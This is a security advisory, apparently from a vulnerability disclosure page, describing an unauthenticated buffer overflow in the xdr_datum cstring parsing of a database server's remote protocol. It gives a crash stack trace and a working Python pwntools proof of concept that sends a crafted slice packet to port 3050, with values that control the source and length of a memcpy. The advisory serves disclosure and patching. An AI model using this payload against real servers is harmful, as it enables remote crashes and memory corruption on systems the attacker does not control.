Buffer overflow on parsing corrupted slice packet

Summary

An unsafe deserialization of slice packet allows any unauthenticated user to perform a buffer overflow attack, which could lead to server crash or security vulnerabilities.

Details

The main bug is in bool_t xdr_datum(xdr_t* xdrs, const dsc* desc, UCHAR* buffer) when desc is a cstring. When parsing a cstring, compliance with the slice descriptor is not checked, i.e., if the length of the cstring exceeds the length of the descriptor (or the length of the entire slice), this cstring will be written to a buffer whose length is equal to the length of the slice, which will lead to a buffer overflow.

Stacktrace when a program crashes due to buffer overflow

#0  __memcpy_avx_unaligned_erms () at ../sysdeps/x86_64/multiarch/memmove-vec-unaligned-erms.S:265
#1  REMOTE_getbytes (xdrs=0x7ffff7e53600, buff=0x7ffff7e55664 "", bytecount=51852) at src/remote/remote.cpp:755
#2  InetXdr::x_getbytes (this=0x7ffff7e53600, buff=0x7ffff7e53690 'a' <repeats 40 times>, "\377\377\377\377", bytecount=60000) at src/remote/inet.cpp:2580
#3  xdr_opaque (xdrs=0x7ffff7e53600, p=0x7ffff7e53690 'a' <repeats 40 times>, "\377\377\377\377", len=60000) at src/common/xdr.cpp:602
#4  xdr_datum (xdrs=0x7ffff7e53600, desc=0x7fffffffc758, buffer=0x7ffff7e53690 'a' <repeats 40 times>, "\377\377\377\377") at src/common/xdr.cpp:214
#5  xdr_slice (xdrs=0x7ffff7e53600, slice=0x7ffff23c29f8, sdl=0x7ffff7e53260 "\001\006\001(\004") at src/remote/protocol.cpp:1883
#6  xdr_protocol (xdrs=0x7ffff7e53600, p=0x7ffff23c2730) at src/remote/protocol.cpp:620
#7  receive (main_port=0x7ffff7e4be40, packet=0x7ffff23c2730) at src/remote/inet.cpp:2041
#8  rem_port::receive (this=0x7ffff7e4be40, pckt=0x7ffff23c2730) at src/remote/remote.cpp:664
#9  SRVR_multi_thread (main_port=0x7ffff7e456c0, flags=2) at src/remote/server/server.cpp:1787
#10 main (argc=1, argv=0x7fffffffd9d0) at src/remote/server/os/posix/inet_server.cpp:582

PoC

To reproduce the vulnerability, simply run the server and the Python script to emulate the malicious packet.

Python script

from pwn import *


def u32be(x: int) -> bytes:
    return p32(x & 0xFFFFFFFF, endian="big")

def xdr_bytes(data: bytes) -> bytes:
    n = len(data)
    pad = (4 - n) & 3
    return u32be(n) + data + (b"\x00" * pad)

def build_desc_str(field_len: int) -> bytes:
    return bytes([0x01, 0x06, 0x01, 0x28, field_len & 0xFF, (field_len >> 8) & 0xFF, 0xFF])

def build_slice_pkg(desc: bytes, buf_len: int, rec_len: int) -> bytes:
    exp1 = b'a'*40 + p32(0xffffffff) + p32(0) + p64(0x400000) # control src, ln in memcpy
    pkt = b""
    pkt += u32be(0x3B)
    pkt += u32be(0)
    pkt += u32be(0) + u32be(0)
    pkt += u32be(0)
    pkt += xdr_bytes(desc)
    pkt += u32be(0)
    pkt += u32be(buf_len)
    pkt += u32be(rec_len)
    pkt += exp1
    pkt += b'a' * (rec_len - len(exp1))
    pkt += b"\x00" * ((4 - rec_len) & 3)
    return pkt


desc = build_desc_str(4)
pkt = build_slice_pkg(desc, 4, 60000)

p = remote("127.0.0.1", 3050)

p.send(pkt)
p.interactive()

Impact

Essentially, every server is affected.

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Uh oh!

Buffer overflow on parsing corrupted slice packet

Package

Affected versions

Patched versions

Description

Summary

Details

PoC

Impact

Severity

CVSS overall score

CVSS v3 base metrics

CVSS v3 base metrics

CVE ID

Weaknesses